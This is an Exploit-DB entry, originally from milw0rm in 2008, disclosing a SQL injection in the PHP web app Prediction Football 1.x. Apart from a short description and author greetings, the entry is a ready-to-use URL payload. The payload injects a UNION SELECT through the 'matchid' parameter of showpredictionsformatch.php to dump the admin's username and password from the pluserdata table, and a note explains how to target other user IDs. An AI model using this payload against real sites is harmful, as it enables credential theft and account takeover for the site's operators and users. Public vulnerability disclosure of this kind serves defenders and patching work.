Prediction Football 1.x - 'matchid' SQL Injection

EDB-ID:

5410


Author:

0in

Type:

webapps


Platform:

PHP

Date:

2008-04-08


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

/*

                                       Prediction Football v 1.x Remote SQL INJECTION

Discovered by 0in from Dark-Coders Programming & Security Group.

!!!!!! > http://dark-coders.4rh.eu < !!!!!!

Contact: 0in(dot)email(at)gmail(dot)com

Greetz to all Dark-Coders Group Members: Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89

Script homepage: http://www.predictionfootball.com/

Description:  Prediction Football is a program that provides a web based administration 
config and automated prediction leagues. This program supports multiple languages. This 
script makes predictions simultaneously. This helps you to message other users and capable 
of multiple fixture creation. This requires web server with support for PHP4.0 or greater, 
MySQL database. Very easy to download and install the program and execute.

*/

Exploit:

http://target.domain/[path]/showpredictionsformatch.php?sid=dupa&matchid=-666/**/union/**/select/**/1,2,3,concat(0x757365723a,username),concat(0x7061737377643a,password),6,7/**/from/**/pluserdata/**/WHERE/**/userid=1/*  

userid=1 - admin user have that userid, you can change that to another user.

//EoFF

# milw0rm.com [2008-04-08]